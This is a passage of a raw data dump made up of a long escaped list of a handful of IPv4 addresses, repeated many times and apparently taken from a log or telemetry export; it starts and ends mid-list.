\"13.72.52.146\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.39.59\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.49.220\",\"13.72.52.146\",\"13.72.52.146\",\"13.72.52.146\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"40.87.53.92\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"40.87.53.92\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"40.122.164.34\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"40.87.53.92\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"13.68.133.167\",\"40.87.53.92\",\"52.170.0.208\",\"52.170.0.208\",\"13.68.133.167\",\"13.68.13